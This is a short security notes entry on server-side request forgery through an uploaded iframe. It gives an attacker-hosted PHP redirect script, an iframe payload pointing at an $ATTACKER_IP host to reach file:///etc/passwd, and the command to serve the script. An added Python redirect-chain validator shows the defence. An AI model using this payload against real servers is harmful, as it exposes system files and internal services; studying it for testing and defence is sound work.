SSRF through iframe

  • Taken from Jomar's Website
  • Upload an iframe whose `src` points at an attacker-controlled server hosting the PHP script below. The script responds with a redirect to a local file on the target server.
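```php
<?php
// Default redirect target: the loopback interface of whatever host follows the redirect.
$loc = "http://127.0.0.1/";

// The "a" query parameter overrides the redirect target.
if(isset($_GET['a'])){
    $loc = $_GET['a'];
}
// Send the redirect; the target is taken as given, with no validation.
header('Location: '.$loc);
?>
```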
  • The payload looks like this:
```html
<iframe src="http://$ATTACKER_IP:4711/ssrf.php?a=file:///etc/passwd"/>
```
  • Start PHP's built-in ad hoc web server in the directory containing the script:
```sh
php -S 0.0.0.0:4711
```
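
In the chain above the local target appears only in the `Location` header, so a server-side renderer or fetcher has to validate every redirect hop and not just the iframe's `src`. The following is an added example, not part of the original notes: `check_target`, `resolve_chain`, the host `attacker.example` and the redirect table are constructed for illustration, and DNS resolution of hostnames is assumed to be checked elsewhere.

```python
import ipaddress
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
MAX_HOPS = 5

# Constructed redirect table standing in for real HTTP responses (URL -> Location header).
SAMPLE_REDIRECTS = {
    "http://attacker.example:4711/ssrf.php?a=file:///etc/passwd": "file:///etc/passwd",
    "http://attacker.example:4711/ssrf.php": "http://127.0.0.1/",
    "https://cdn.example.org/old": "/new",
}


def check_target(url):
    """Return None if the URL may be fetched, else the reason it is refused."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return "missing host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Hostname, not an IP literal. Assumption: the real fetcher also
        # resolves it and applies the same address check to the result.
        return "internal hostname" if host == "localhost" else None
    if not ip.is_global:
        return f"non-public address {ip}"
    return None


def resolve_chain(start_url, redirects=SAMPLE_REDIRECTS):
    """Walk a redirect chain, validating every hop. Returns (final_url or None, reason)."""
    url = start_url
    for _ in range(MAX_HOPS + 1):
        reason = check_target(url)
        if reason:
            return None, f"blocked {url}: {reason}"
        location = redirects.get(url)
        if location is None:
            return url, "ok"
        url = urljoin(url, location)  # Location may be relative
    return None, "too many redirects"
```
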